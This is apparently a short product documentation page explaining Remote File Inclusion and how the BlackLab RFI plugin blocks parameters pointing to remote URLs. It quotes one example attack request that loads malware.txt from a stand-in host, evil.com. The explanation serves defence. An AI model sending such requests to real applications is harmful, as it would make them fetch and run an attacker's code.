Skip to main content

Documentation Index

Fetch the complete documentation index at: https://blacklab.windmotion.io/llms.txt

Use this file to discover all available pages before exploring further.

Remote File Inclusion (RFI) is a vulnerability where an attacker makes your app load and execute a file from a remote server.

Example attack

GET /index.php?page=http://evil.com/malware.txt
If not protected, this could execute malicious code from the attacker’s server.

## How BlackLab helps
BlackLab’s RFI plugin blocks requests that try to include remote files, such as:

URLs starting with http:// or https:// in parameters

Suspicious query values that point outside your app